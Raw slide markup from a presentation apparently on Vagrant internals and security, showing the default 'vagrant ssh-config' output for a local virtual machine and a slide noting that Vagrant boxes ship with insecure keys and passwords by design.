              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-conig  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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HostName 127.0.0.1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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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1</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="3131820">
              <a:lnSpc>
                <a:spcPct val="134300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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# 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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3</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2480310">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75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/dev/null  StrictHostKeyChecking no  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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no</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="695960">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentityFile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”/home/user/.vagrant.d/insecure_private_key”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# 4  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentitiesOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LogLevel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>FATAL</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="705"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2222. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>port-collision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>detected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2201, 2202, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be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14" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used.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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0"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17" y="190436"/>
            <a:ext cx="20148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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436773" y="1366288"/>
            <a:ext cx="171913" cy="1719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6929" y="1553349"/>
            <a:ext cx="322580" cy="353060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="322074" y="83426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="315517" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155213" y="83426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="166852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315517" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322074" y="83426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="168423" y="268846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161805" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="184632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="353060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161805" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168423" y="268846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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04701" y="2290706"/>
            <a:ext cx="172700" cy="1727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299" y="2805690"/>
            <a:ext cx="188958" cy="1889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8589" y="699201"/>
            <a:ext cx="3484879" cy="2287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90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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12700" marR="2447925">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-conig  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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HostName 127.0.0.1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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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1</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2440305">
              <a:lnSpc>
                <a:spcPct val="134300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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# 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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3</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1788795">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75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/dev/null  StrictHostKeyChecking no  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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no</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="5080">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentityFile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”/home/user/.vagrant.d/insecure_private_key”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# 4  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentitiesOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LogLevel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>FATAL</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>insecure private </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>key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50" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(default)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0"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122" y="190436"/>
            <a:ext cx="93789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sz="1200" spc="-250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1200" spc="-145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SECURITY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5700" y="1295412"/>
            <a:ext cx="4034154" cy="7861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87655">
              <a:lnSpc>
                <a:spcPct val="102600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>boxes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>featuring </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>public  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>keypairs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>potentially </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>allow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>root  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-245" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-17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50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrantup.com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-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-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5" dirty="0"/>
              <a:t>34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17" y="190436"/>
            <a:ext cx="19323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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INIT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430"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-204" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
